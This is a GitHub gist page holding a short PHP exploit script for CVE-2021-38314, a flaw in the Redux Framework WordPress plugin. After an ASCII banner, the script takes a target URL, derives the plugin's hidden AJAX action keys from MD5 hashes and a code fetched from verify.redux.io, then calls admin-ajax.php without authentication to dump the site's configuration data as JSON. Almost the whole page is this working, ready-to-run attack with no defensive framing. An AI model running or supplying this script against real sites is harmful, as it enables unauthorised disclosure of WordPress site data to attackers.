Created
November 17, 2021 17:25
-
-
Save powerexploit/9b00619d7a61feb7271e88a36dd9a1e2 to your computer and use it in GitHub Desktop.
Php Exploit script CVE-2021-38314
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
print " | |
_______ ________ ___ ___ ___ __ ____ ___ ____ __ _ _ | |
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | |___ \ / _ \___ \/_ | || | | |
| | \ \ / /| |__ ______ ) | | | | ) || |______ __) | (_) |__) || | || |_ | |
| | \ \/ / | __|______/ /| | | |/ / | |______|__ < > _ <|__ < | |__ _| | |
| |____ \ / | |____ / /_| |_| / /_ | | ___) | (_) |__) || | | | | |
\_____| \/ |______| |____|\___/____||_| |____/ \___/____/ |_| |_| | |
Author: @powerexploit | |
"; | |
$target = "<url>"; | |
# Add the target url | |
$key1 = md5("$target/-redux"); | |
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1"); | |
$key3 = md5($key2.'-support'); | |
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/"); | |
$json1=file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code"); | |
$json2 = json_encode(json_decode($json1), JSON_PRETTY_PRINT); | |
echo $json2; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment